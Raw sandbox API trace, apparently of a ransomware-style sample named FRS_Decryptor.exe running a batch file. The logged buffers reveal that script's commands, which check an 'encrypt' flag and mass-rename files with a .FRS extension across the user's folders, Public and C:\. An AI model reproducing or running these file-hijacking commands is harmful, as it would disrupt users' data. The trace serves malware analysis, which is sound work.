cbMultiByte=78, lpWideCharStr=0xd43838, cchWideChar=78 | out: lpWideCharStr="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n") returned 78 [0130.670] lstrcmpiW (lpString1="\"FRS_Decryptor.exe\"", lpString2="\"FRS_Decryptor.exe\"") returned 0 [0130.670] GetConsoleTitleW (in: lpConsoleTitle=0xc8ebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0130.670] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8e900, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0130.670] _open_osfhandle (_OSFileHandle=0x154, _Flags=8) returned 3 [0130.670] _get_osfhandle (_FileHandle=3) returned 0x154 [0130.670] SetFilePointer (in: hFile=0x154, lDistanceToMove=2627, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0130.671] _get_osfhandle (_FileHandle=3) returned 0x154 [0130.671] GetFileSize (in: hFile=0x154, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa6e [0130.671] _wcsnicmp (_String1="4", _String2=":EOF", _MaxCount=0x4) returned -6 [0130.671] _get_osfhandle (_FileHandle=3) returned 0x154 [0130.671] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0130.671] _get_osfhandle (_FileHandle=3) returned 0x154 [0130.671] GetFileType (hFile=0x154) returned 0x1 [0130.671] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0130.671] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x2b, lpOverlapped=0x0) returned 1 [0130.671] SetFilePointer (in: hFile=0x154, lDistanceToMove=2662, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0130.671] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\FRS_Decryptor.exe\r\n") returned 35 [0130.671] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0130.671] _get_osfhandle (_FileHandle=3) returned 0x154 [0130.671] GetFileType (hFile=0x154) returned 0x1 [0130.671] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0130.671] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x8, lpOverlapped=0x0) returned 1 [0130.671] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 4\r\nYFILES%\\FRS_Decryptor.exe\r\n") returned 8 [0130.671] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa6e [0130.671] _get_osfhandle (_FileHandle=3) returned 0x154 [0130.671] GetFileType (hFile=0x154) returned 0x1 [0130.671] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa6e [0130.671] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x0, lpOverlapped=0x0) returned 1 [0130.671] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.671] _get_osfhandle (_FileHandle=3) returned 0x154 [0130.671] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.671] _get_osfhandle (_FileHandle=3) returned 0x154 [0130.671] GetFileType (hFile=0x154) returned 0x1 [0130.671] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.671] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0130.671] SetFilePointer (in: hFile=0x154, lDistanceToMove=8, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0130.671] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="@shift\r\n") returned 8 [0130.671] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0130.672] _get_osfhandle (_FileHandle=3) returned 0x154 [0130.672] GetFileType (hFile=0x154) returned 0x1 [0130.672] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0130.672] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0130.672] SetFilePointer (in: hFile=0x154, lDistanceToMove=19, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0130.672] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=11, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="@echo off\r\nLES%\\FRS_Decryptor.exe\r\n") returned 11 [0130.672] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0130.672] _get_osfhandle (_FileHandle=3) returned 0x154 [0130.672] GetFileType (hFile=0x154) returned 0x1 [0130.672] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0130.672] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0130.672] SetFilePointer (in: hFile=0x154, lDistanceToMove=21, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0130.672] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\ncho off\r\n") returned 2 [0130.672] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0130.672] _get_osfhandle (_FileHandle=3) returned 0x154 [0130.672] GetFileType (hFile=0x154) returned 0x1 [0130.672] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0130.672] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0130.672] SetFilePointer (in: hFile=0x154, lDistanceToMove=25, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0130.672] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":1\r\no off\r\n") returned 4 [0130.672] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0130.672] _get_osfhandle (_FileHandle=3) returned 0x154 [0130.672] GetFileType (hFile=0x154) returned 0x1 [0130.672] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0130.672] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0130.672] SetFilePointer (in: hFile=0x154, lDistanceToMove=98, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0130.672] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="for /f \"delims=\" %%i in ('find \"e\" \"C:\\FRS_TEMP\\temp.txt\"')do set n=%%i\r\nl_flag.png\r\n") returned 73 [0130.672] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0130.672] _get_osfhandle (_FileHandle=3) returned 0x154 [0130.672] GetFileType (hFile=0x154) returned 0x1 [0130.672] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0130.673] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0130.673] SetFilePointer (in: hFile=0x154, lDistanceToMove=130, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0130.673] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=32, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="If \\\"%e%\\\"==\\\"encrypt\\\" goto 3\r\ne\" \"C:\\FRS_TEMP\\temp.txt\"')do set n=%%i\r\n") returned 32 [0130.673] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0130.673] _get_osfhandle (_FileHandle=3) returned 0x154 [0130.673] GetFileType (hFile=0x154) returned 0x1 [0130.673] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0130.673] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0130.673] SetFilePointer (in: hFile=0x154, lDistanceToMove=135, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0130.673] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=5, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="cls\r\n%e%\\\"==\\\"encrypt\\\" goto 3\r\n") returned 5 [0130.673] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0130.673] _get_osfhandle (_FileHandle=3) returned 0x154 [0130.673] GetFileType (hFile=0x154) returned 0x1 [0130.673] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0130.673] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0130.673] SetFilePointer (in: hFile=0x154, lDistanceToMove=143, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0130.673] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 2\r\n\\\"==\\\"encrypt\\\" goto 3\r\n") returned 8 [0130.673] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0130.673] _get_osfhandle (_FileHandle=3) returned 0x154 [0130.673] GetFileType (hFile=0x154) returned 0x1 [0130.673] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0130.673] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0130.673] SetFilePointer (in: hFile=0x154, lDistanceToMove=145, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0130.673] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 2\r\n") returned 2 [0130.673] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0130.673] _get_osfhandle (_FileHandle=3) returned 0x154 [0130.673] GetFileType (hFile=0x154) returned 0x1 [0130.674] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0130.674] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0130.674] SetFilePointer (in: hFile=0x154, lDistanceToMove=149, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0130.674] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":2\r\n 2\r\n") returned 4 [0130.674] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0130.674] _get_osfhandle (_FileHandle=3) returned 0x154 [0130.674] GetFileType (hFile=0x154) returned 0x1 [0130.674] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0130.674] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0130.674] SetFilePointer (in: hFile=0x154, lDistanceToMove=196, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0130.674] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=47, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Desktop\\*.*\" *.*.FRS\r\n\\temp.txt\"')do set n=%%i\r\n") returned 47 [0130.674] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0130.674] _get_osfhandle (_FileHandle=3) returned 0x154 [0130.674] GetFileType (hFile=0x154) returned 0x1 [0130.674] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0130.674] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0130.674] SetFilePointer (in: hFile=0x154, lDistanceToMove=247, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0130.674] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=51, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Saved Games\\*.*\" *.*.FRS\r\np.txt\"')do set n=%%i\r\n") returned 51 [0130.674] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0130.674] _get_osfhandle (_FileHandle=3) returned 0x154 [0130.674] GetFileType (hFile=0x154) returned 0x1 [0130.674] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0130.674] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0130.674] SetFilePointer (in: hFile=0x154, lDistanceToMove=292, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0130.674] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=45, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Links\\*.*\" *.*.FRS\r\n.FRS\r\n") returned 45 [0130.674] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0130.674] _get_osfhandle (_FileHandle=3) returned 0x154 [0130.674] GetFileType (hFile=0x154) returned 0x1 [0130.674] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0130.674] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0130.675] SetFilePointer (in: hFile=0x154, lDistanceToMove=341, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0130.675] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=49, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Favorites\\*.*\" *.*.FRS\r\n\r\n") returned 49 [0130.675] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0130.675] _get_osfhandle (_FileHandle=3) returned 0x154 [0130.675] GetFileType (hFile=0x154) returned 0x1 [0130.675] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0130.675] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0130.675] SetFilePointer (in: hFile=0x154, lDistanceToMove=389, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0130.675] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=48, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Searches\\*.*\" *.*.FRS\r\n\n") returned 48 [0130.675] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0130.675] _get_osfhandle (_FileHandle=3) returned 0x154 [0130.675] GetFileType (hFile=0x154) returned 0x1 [0130.675] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0130.675] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0130.675] SetFilePointer (in: hFile=0x154, lDistanceToMove=435, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0130.675] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=46, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Videos\\*.*\" *.*.FRS\r\n\r\n") returned 46 [0130.675] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0130.675] _get_osfhandle (_FileHandle=3) returned 0x154 [0130.675] GetFileType (hFile=0x154) returned 0x1 [0130.675] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0130.675] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0130.675] SetFilePointer (in: hFile=0x154, lDistanceToMove=483, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0130.675] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=48, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Pictures\\*.*\" *.*.FRS\r\n") returned 48 [0130.675] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0130.675] _get_osfhandle (_FileHandle=3) returned 0x154 [0130.675] GetFileType (hFile=0x154) returned 0x1 [0130.675] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0130.675] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0130.675] SetFilePointer (in: hFile=0x154, lDistanceToMove=518, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0130.675] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\Public\\*.*\" *.*.FRS\r\n.*\" *.*.FRS\r\n") returned 35 [0130.675] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0130.676] _get_osfhandle (_FileHandle=3) returned 0x154 [0130.676] GetFileType (hFile=0x154) returned 0x1 [0130.676] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0130.676] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0130.676] SetFilePointer (in: hFile=0x154, lDistanceToMove=540, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0130.676] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\*.*\" *.*.FRS\r\n.*\" *.*.FRS\r\n") returned 22 [0130.676] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0130.676] _get_osfhandle (_FileHandle=3) returned 0x154 [0130.676] GetFileType (hFile=0x154) returned 0x1 [0130.676] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0130.676] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0130.676] SetFilePointer (in: hFile=0x154, lDistanceToMove=562, lpDistanceToMoveHigh=0x0, 